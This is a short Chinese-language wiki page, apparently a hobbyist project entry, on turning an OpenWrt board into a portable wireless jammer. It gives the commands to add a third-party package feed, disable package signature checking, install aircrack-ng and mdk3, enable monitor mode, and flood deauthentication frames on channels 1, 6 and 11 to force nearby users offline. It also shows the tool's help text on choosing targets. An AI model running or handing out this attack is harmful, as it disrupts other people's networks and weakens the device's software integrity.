项目二十二--便携仪无线网络瘫痪仪
Shengkai_81@163.com(讨论 | 贡献)2015年12月27日 (日) 08:20的版本 (Created page with "无线网络瘫痪利用无线攻击工具mdk3,openwrt官方源中当前已不提供,不过microwrt源中已为各位玩家添加。 mdk3相关的说用说明请自行度...")
无线网络瘫痪利用无线攻击工具mdk3,openwrt官方源中当前已不提供,不过microwrt源中已为各位玩家添加。
mdk3相关的说用说明请自行度娘,这里仅演示攻击周边无线链接,迫其下线从而达到无线网络瘫痪的目的。
安装
首先添加microwrt源,各位可在/etc/opkg.conf文件末尾加入如下一行:
src/gz microwrt http://repo.microduino.cn/microwrt/
并且移除option check_signature 1,然后运行
opkg update && opkg install wireless-tools aircrack-ng mdk3
安装相应的软件。
使用
使用mdk3之前首先需要将无线设置为monitor模式,为保证连接,下述命令均需在串口终端中运行,以免网络断开。
airmon-ng start wlan0
开启monitor模式后,即可开始攻击:
mdk3 mon0 d -s 120 -c 1,6,11
上述命令为对通道1,6,11的无线进行攻击,相关的帮助如下:
root@microwrt:~# mdk3 --help d d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP OPTIONS: -w <filename> Read file containing MACs not to care about (Whitelist mode) -b <filename> Read file containing MACs to run test on (Blacklist Mode) -s <pps> Set speed in packets per second (Default: unlimited) -c [chan,chan,chan,...] Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.
从帮助信息可见,可针对白名单或者黑名单列表中的无线进行攻击。